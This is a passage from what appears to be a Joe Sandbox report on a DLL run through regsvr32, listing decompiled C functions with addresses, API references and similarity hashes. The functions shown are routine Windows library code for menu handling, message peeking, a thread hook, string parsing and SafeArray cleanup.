                                                                                                                0x00000000
                                                                                                                0x1002dfa0
                                                                                                                0x1002df86
                                                                                                                0x1002df31
                                                                                                                0x1002df33
                                                                                                                0x1002df3a
                                                                                                                0x1002df3c
                                                                                                                0x1002df3f
                                                                                                                0x1002df41
                                                                                                                0x1002df45
                                                                                                                0x1002df45
                                                                                                                0x1002df41
                                                                                                                0x1002df3a
                                                                                                                0x1002df4a
                                                                                                                0x1002df52
                                                                                                                0x1002df5a
                                                                                                                0x1002df62
                                                                                                                0x1002df6a
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __msize_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1288803200-0
                                                                                                                • Opcode ID: c604cdb1ac1694098f500fcf6eebba443d2bc496ac9e967a338fbdfcaf44ed65
                                                                                                                • Instruction ID: 8653847d44943ef48ff8e6c78178e48b2ea11dbf30873dab36e413152f37f1e6
                                                                                                                • Opcode Fuzzy Hash: c604cdb1ac1694098f500fcf6eebba443d2bc496ac9e967a338fbdfcaf44ed65
                                                                                                                • Instruction Fuzzy Hash: 832182352006109FCB85FF20E982E6A77E4EF40694B91857BE81ACB592DB30EC51CB89
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10004790 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10004790(void* __ecx, int _a4, intOrPtr _a8) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t40;
				int _t45;
				int _t57;
				int _t71;
				void* _t74;
				intOrPtr _t83;

				_t57 = _a4;
				_t74 = __ecx;
				if(_t57 == 0) {
					return 1;
				} else {
					_t2 = _t57 + 4; // 0x10060324
					_t40 = GetMenuItemCount( *_t2);
					_t71 = 0;
					_a4 = _t40;
					if(_t40 <= 0) {
						return 1;
					} else {
						do {
							E100229F2(_t57, _t57, _t71, _t74 + 8 + ( *(_t74 + 0xf8) +  *(_t74 + 0xf8) * 2) * 4, 0x400);
							_t10 = _t57 + 4; // 0x10060324
							_t45 = GetMenuItemID( *_t10, _t71);
							if(_t45 == 0xffffffff && _a8 != 0) {
								_t45 = 0xfffffffe;
							}
							 *(_t74 + 0x10 + ( *(_t74 + 0xf8) +  *(_t74 + 0xf8) * 2) * 4) = _t45;
							if(_t45 > 0) {
								 *((intOrPtr*)(_t74 + ( *(_t74 + 0xf8) + 1 + ( *(_t74 + 0xf8) + 1) * 2) * 4)) =  *((intOrPtr*)(_t74 + 0xfc));
								_t24 = _t74 + 0xfc;
								 *_t24 =  *((intOrPtr*)(_t74 + 0xfc)) + 1;
								_t83 =  *_t24;
							}
							_t31 = _t57 + 4; // 0x10060324
							ModifyMenuA( *_t31, _t71, 0x500,  *(_t74 + ( *(_t74 + 0xf8) +  *(_t74 + 0xf8) * 2) * 4 + 0x10), _t74 + ( *(_t74 + 0xf8) +  *(_t74 + 0xf8) * 2) * 4 + 8);
							 *(_t74 + 0xf8) =  *(_t74 + 0xf8) + 1;
							_t36 = _t57 + 4; // 0x10060324
							_push(GetSubMenu( *_t36, _t71));
							if(E10022961(_t57,  *_t31, _t71, _t74, _t83) != 0) {
								E10004790(_t74, _t51, 0);
							}
							_t71 = _t71 + 1;
						} while (_t71 < _v0);
						return 1;
					}
				}
			}














                                                                                                                0x10004791
                                                                                                                0x10004798
                                                                                                                0x1000479a
                                                                                                                0x10004895
                                                                                                                0x100047a0
                                                                                                                0x100047a0
                                                                                                                0x100047a5
                                                                                                                0x100047ab
                                                                                                                0x100047af
                                                                                                                0x100047b3
                                                                                                                0x1000488b
                                                                                                                0x100047b9
                                                                                                                0x100047c0
                                                                                                                0x100047d6
                                                                                                                0x100047db
                                                                                                                0x100047e0
                                                                                                                0x100047e9
                                                                                                                0x100047f2
                                                                                                                0x100047f2
                                                                                                                0x10004802
                                                                                                                0x10004806
                                                                                                                0x1000481a
                                                                                                                0x1000481d
                                                                                                                0x1000481d
                                                                                                                0x1000481d
                                                                                                                0x1000481d
                                                                                                                0x10004830
                                                                                                                0x10004842
                                                                                                                0x10004844
                                                                                                                0x1000484b
                                                                                                                0x10004856
                                                                                                                0x1000485e
                                                                                                                0x10004865
                                                                                                                0x10004865
                                                                                                                0x1000486a
                                                                                                                0x1000486d
                                                                                                                0x10004880
                                                                                                                0x10004880
                                                                                                                0x100047b3

                                                                                                                APIs
                                                                                                                • GetMenuItemCount.USER32(10060324), ref: 100047A5
                                                                                                                  • Part of subcall function 100229F2: GetMenuStringA.USER32 ref: 10022A0D
                                                                                                                  • Part of subcall function 100229F2: GetMenuStringA.USER32 ref: 10022A2E
                                                                                                                • GetMenuItemID.USER32(10060324,00000000), ref: 100047E0
                                                                                                                • ModifyMenuA.USER32(10060324,00000000,00000500,?,?), ref: 10004842
                                                                                                                • GetSubMenu.USER32 ref: 10004850
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$ItemString$CountModify
                                                                                                                • String ID:
                                                                                                                • API String ID: 2546154514-0
                                                                                                                • Opcode ID: 42cd8560699709697a9cced2968adb864664a594a4e7480527313fa351ed6223
                                                                                                                • Instruction ID: deee462cda47ce2732a792b11f20996d373c355acb8ee64d9fe90b95aaef22d5
                                                                                                                • Opcode Fuzzy Hash: 42cd8560699709697a9cced2968adb864664a594a4e7480527313fa351ed6223
                                                                                                                • Instruction Fuzzy Hash: C7318F752006029BE760DF28D884FA6B3E8EB84754F42896DF555CB295EB71F848CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003A9AC Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E1003A9AC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E1003D1E6(E10054E96, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E100231D3(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E10022A6E();
						}
						L17:
						return E1003D2BE(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E10022A6E();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}







                                                                                                                0x1003a9ac
                                                                                                                0x1003a9ac
                                                                                                                0x1003a9b3
                                                                                                                0x1003a9be
                                                                                                                0x1003a9c4
                                                                                                                0x1003a9d1
                                                                                                                0x1003a9d4
                                                                                                                0x1003aa39
                                                                                                                0x1003aa39
                                                                                                                0x1003aa3c
                                                                                                                0x1003aa5e
                                                                                                                0x1003aa64
                                                                                                                0x1003aa66
                                                                                                                0x1003aa70
                                                                                                                0x1003aa70
                                                                                                                0x1003aa73
                                                                                                                0x1003aa73
                                                                                                                0x1003aa7a
                                                                                                                0x1003aa7c
                                                                                                                0x1003aa7f
                                                                                                                0x1003aa80
                                                                                                                0x1003aa80
                                                                                                                0x1003aa88
                                                                                                                0x1003aa8d
                                                                                                                0x1003aa8d
                                                                                                                0x1003aa3e
                                                                                                                0x1003aa3e
                                                                                                                0x1003aa42
                                                                                                                0x1003aa45
                                                                                                                0x1003aa47
                                                                                                                0x1003aa4a
                                                                                                                0x1003aa4b
                                                                                                                0x1003aa4b
                                                                                                                0x1003aa50
                                                                                                                0x1003aa52
                                                                                                                0x00000000
                                                                                                                0x1003aa52
                                                                                                                0x1003a9d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a9e0
                                                                                                                0x1003a9e8
                                                                                                                0x00000000
                                                                                                                0x1003a9ef
                                                                                                                0x1003a9f5
                                                                                                                0x1003a9fc
                                                                                                                0x1003aa0f
                                                                                                                0x1003aa13
                                                                                                                0x1003aa26
                                                                                                                0x1003aa31
                                                                                                                0x1003aa34
                                                                                                                0x00000000
                                                                                                                0x1003aa34

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1003A9B3
                                                                                                                • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1003AA0D
                                                                                                                • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1003AA24
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1003AA5E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePeek$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3998274959-0
                                                                                                                • Opcode ID: 08d601f7536708ffa6be7cf8b188931ad43e828f65b9250ab0ebf7c79f9c2c95
                                                                                                                • Instruction ID: bbed5bcb0719437d8aa26584325781a19963b2874c79f7070563e1747844a59f
                                                                                                                • Opcode Fuzzy Hash: 08d601f7536708ffa6be7cf8b188931ad43e828f65b9250ab0ebf7c79f9c2c95
                                                                                                                • Instruction Fuzzy Hash: 94318B36A0060AAFDF21DFA4DE95E9E77E8FF05341F010A1AF642AA1C1D770AA40CA11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100239FB Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E100239FB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr* _t44;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				intOrPtr* _t71;
				intOrPtr* _t73;
				void* _t75;
				void* _t76;

				_t76 = __eflags;
				_push(0x60);
				E1003D219(E10053862, __ebx, __edi, __esi);
				_t71 =  *((intOrPtr*)(_t75 + 8));
				_t73 =  *((intOrPtr*)(_t71 + 4));
				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
				E10018895(_t75 - 0x68, _t76);
				 *(_t75 - 4) = 0;
				 *(_t75 - 4) = 1;
				 *((intOrPtr*)(E10022C52(0, _t71, _t73, _t76) + 4)) =  *((intOrPtr*)( *_t71 + 4));
				_t36 = E10023187(0, _t71, _t73, _t76);
				_t9 = _t36 + 0x74; // 0x74
				 *((intOrPtr*)(_t73 + 0x1c)) = _t36;
				 *((intOrPtr*)(E10022D0E(0, _t9, _t71, _t73, _t76) + 4)) = _t73;
				E100238D2(_t73, _t76);
				_t40 =  *((intOrPtr*)(E10023187(0, _t71, _t73, _t76) + 4));
				if(_t40 != 0 &&  *((intOrPtr*)(_t73 + 0x20)) == 0) {
					_t54 =  *((intOrPtr*)(_t40 + 0x20));
					if(_t54 != 0 &&  *((intOrPtr*)(_t54 + 0x20)) != 0) {
						E10019C57(_t75 - 0x68, _t75,  *((intOrPtr*)(_t54 + 0x20)));
						 *((intOrPtr*)(_t73 + 0x20)) = _t75 - 0x68;
					}
				}
				 *(_t75 - 4) = 0;
				_t59 =  *(_t71 + 0x14);
				SetEvent( *(_t71 + 0x10));
				WaitForSingleObject(_t59, 0xffffffff);
				CloseHandle(_t59);
				_t44 =  *((intOrPtr*)(_t73 + 0x38));
				_t81 = _t44;
				if(_t44 == 0) {
					_t46 =  *((intOrPtr*)( *_t73 + 0x50))();
					__eflags = _t46;
					_t47 =  *_t73;
					if(_t46 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x54))();
					} else {
						_t48 =  *((intOrPtr*)(_t47 + 0x68))();
					}
				} else {
					_t48 =  *_t44( *((intOrPtr*)(_t73 + 0x34)));
				}
				E10019C90(_t59, _t75 - 0x68);
				_push(1);
				E100235DB(_t75 - 0x68, _t81, _t48);
				 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
				E1001A3E3(_t59, _t75 - 0x68, _t71, _t48, _t81);
				return E1003D2BE(0);
			}















                                                                                                                0x100239fb
                                                                                                                0x100239fb
                                                                                                                0x10023a02
                                                                                                                0x10023a07
                                                                                                                0x10023a0a
                                                                                                                0x10023a10
                                                                                                                0x10023a13
                                                                                                                0x10023a1a
                                                                                                                0x10023a1d
                                                                                                                0x10023a2b
                                                                                                                0x10023a2e
                                                                                                                0x10023a33
                                                                                                                0x10023a36
                                                                                                                0x10023a3e
                                                                                                                0x10023a41
                                                                                                                0x10023a4b
                                                                                                                0x10023a50
                                                                                                                0x10023a57
                                                                                                                0x10023a5c
                                                                                                                0x10023a69
                                                                                                                0x10023a71
                                                                                                                0x10023a71
                                                                                                                0x10023a5c
                                                                                                                0x10023a74
                                                                                                                0x10023aac
                                                                                                                0x10023aaf
                                                                                                                0x10023ab8
                                                                                                                0x10023abf
                                                                                                                0x10023ac5
                                                                                                                0x10023ac8
                                                                                                                0x10023aca
                                                                                                                0x10023ad8
                                                                                                                0x10023adb
                                                                                                                0x10023add
                                                                                                                0x10023ae1
                                                                                                                0x10023ae8
                                                                                                                0x10023ae3
                                                                                                                0x10023ae3
                                                                                                                0x10023ae3
                                                                                                                0x10023acc
                                                                                                                0x10023acf
                                                                                                                0x10023ad1
                                                                                                                0x10023af0
                                                                                                                0x10023af5
                                                                                                                0x10023af8
                                                                                                                0x10023afd
                                                                                                                0x10023b04
                                                                                                                0x10023b10

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 10023A02
                                                                                                                  • Part of subcall function 100238D2: GetCurrentThreadId.KERNEL32 ref: 100238E5
                                                                                                                  • Part of subcall function 100238D2: SetWindowsHookExA.USER32(000000FF,Function_0002373E,00000000,00000000), ref: 100238F5
                                                                                                                • SetEvent.KERNEL32(?,00000060), ref: 10023AAF
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10023AB8
                                                                                                                • CloseHandle.KERNEL32(?), ref: 10023ABF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1532457625-0
                                                                                                                • Opcode ID: 470b81a69e69308e87bf9dd7fdd099998e305917592de0039beec760d3206212
                                                                                                                • Instruction ID: 91d5618217ead3b992386f55b2444b571cb73ca952898fd6defaaeb9cdb1d30a
                                                                                                                • Opcode Fuzzy Hash: 470b81a69e69308e87bf9dd7fdd099998e305917592de0039beec760d3206212
                                                                                                                • Instruction Fuzzy Hash: 94314B78A00705DFCB14DFB4D98595DBBF0FF08310B91866DE58A9B2A2DB31EA41CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001DCBB Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 20%
                                                                                                                			E1001DCBB(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E1003C669(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E1003C669( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E1003F111( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E1003F022();
						} else {
							_t23 = E1003EFF9();
						}
						L17:
						return E1003B437(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}















                                                                                                                0x1001dcbb
                                                                                                                0x1001dcbb
                                                                                                                0x1001dcc4
                                                                                                                0x1001dccb
                                                                                                                0x1001dcd1
                                                                                                                0x1001dcd4
                                                                                                                0x1001dcd9
                                                                                                                0x1001dcdf
                                                                                                                0x1001dce0
                                                                                                                0x1001dce3
                                                                                                                0x1001dce8
                                                                                                                0x1001dcfb
                                                                                                                0x1001dcfc
                                                                                                                0x1001dcfe
                                                                                                                0x1001dd04
                                                                                                                0x1001dd1f
                                                                                                                0x1001dd14
                                                                                                                0x1001dd1a
                                                                                                                0x1001dd1a
                                                                                                                0x1001dd24
                                                                                                                0x1001dd28
                                                                                                                0x1001dd31
                                                                                                                0x1001dd31
                                                                                                                0x1001dd37
                                                                                                                0x1001dd3f
                                                                                                                0x1001dd40
                                                                                                                0x1001dd41
                                                                                                                0x1001dd43
                                                                                                                0x1001dd43
                                                                                                                0x1001dd47
                                                                                                                0x1001dcf0
                                                                                                                0x1001dcf0
                                                                                                                0x00000000
                                                                                                                0x1001dd49
                                                                                                                0x1001dd4d
                                                                                                                0x1001dd55
                                                                                                                0x1001dd57
                                                                                                                0x1001dd58
                                                                                                                0x1001dd61
                                                                                                                0x1001dd5a
                                                                                                                0x1001dd5a
                                                                                                                0x1001dd5a
                                                                                                                0x1001dd69
                                                                                                                0x1001dd75
                                                                                                                0x1001dd75
                                                                                                                0x1001dd47
                                                                                                                0x1001dcec
                                                                                                                0x1001dcee
                                                                                                                0x1001dcee
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CharNextA.USER32(?), ref: 1001DD12
                                                                                                                  • Part of subcall function 1003C669: __ismbcspace_l.LIBCMT ref: 1003C66F
                                                                                                                • CharNextA.USER32(00000000), ref: 1001DD2F
                                                                                                                • _strtol.LIBCMT ref: 1001DD5A
                                                                                                                • _strtoul.LIBCMT ref: 1001DD61
                                                                                                                  • Part of subcall function 1003F022: strtoxl.LIBCMT ref: 1003F042
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                • String ID:
                                                                                                                • API String ID: 4211061542-0
                                                                                                                • Opcode ID: 25463e5b0bf133586b7cdf245735b04a5a213f7af39cc14f1cd53aa4100b8590
                                                                                                                • Instruction ID: 63093995eb286e337a1dc0123a3d735157bfa6acab36133d4a00bfca87353496
                                                                                                                • Opcode Fuzzy Hash: 25463e5b0bf133586b7cdf245735b04a5a213f7af39cc14f1cd53aa4100b8590
                                                                                                                • Instruction Fuzzy Hash: 07212476600255AFCB21FB759C41BAAB7E8DF18341F110067EA80DF181DB70EE80CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10032229 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E10032229(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E100321C6( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}









                                                                                                                0x1003222d
                                                                                                                0x10032232
                                                                                                                0x100322d6
                                                                                                                0x100322d6
                                                                                                                0x10032239
                                                                                                                0x10032241
                                                                                                                0x10032255
                                                                                                                0x10032258
                                                                                                                0x100322ae
                                                                                                                0x100322b4
                                                                                                                0x100322b4
                                                                                                                0x100322b7
                                                                                                                0x100322bc
                                                                                                                0x100322cd
                                                                                                                0x100322cd
                                                                                                                0x00000000
                                                                                                                0x100322d3
                                                                                                                0x1003225a
                                                                                                                0x1003225b
                                                                                                                0x1003229e
                                                                                                                0x1003229e
                                                                                                                0x100322a2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100322a7
                                                                                                                0x00000000
                                                                                                                0x100322a7
                                                                                                                0x1003225d
                                                                                                                0x10032260
                                                                                                                0x10032296
                                                                                                                0x00000000
                                                                                                                0x10032296
                                                                                                                0x10032262
                                                                                                                0x10032263
                                                                                                                0x00000000
                                                                                                                0x10032265
                                                                                                                0x10032265
                                                                                                                0x10032268
                                                                                                                0x10032270
                                                                                                                0x10032275
                                                                                                                0x1003227a
                                                                                                                0x10032283
                                                                                                                0x10032286
                                                                                                                0x1003228b
                                                                                                                0x10032290
                                                                                                                0x10032290
                                                                                                                0x1003228b
                                                                                                                0x1003227a
                                                                                                                0x00000000
                                                                                                                0x10032268
                                                                                                                0x10032263
                                                                                                                0x10032243
                                                                                                                0x10032247
                                                                                                                0x00000000
                                                                                                                0x10032249
                                                                                                                0x1003224a
                                                                                                                0x00000000
                                                                                                                0x1003224a

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArrayDestroyFreeSafeTask
                                                                                                                • String ID:
                                                                                                                • API String ID: 3253174383-0
                                                                                                                • Opcode ID: 1b0f3043e45d70972d82d0e22df10beabba36c5207b92ffbc69bea4338304dcf
                                                                                                                • Instruction ID: 7c6a25e81efe522572f188cc284e61a9823761e9066aeb58094c9b0e6ac1569a
                                                                                                                • Opcode Fuzzy Hash: 1b0f3043e45d70972d82d0e22df10beabba36c5207b92ffbc69bea4338304dcf
                                                                                                                • Instruction Fuzzy Hash: AF112631600616BFDB5ACFA5DC88BAB77E8FF14292F114418F8559F694CB35E940CA60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10030DE8 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E10030DE8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x30);
				E1003D1E6(E100545DD, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0x1005bb60;
				_t62 =  *((intOrPtr*)(_t64 + 8));
				_t56 = _t64 - 0x14;
				 *(_t64 - 4) = 0;
				E100231D3(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
				 *(_t64 - 4) = 1;
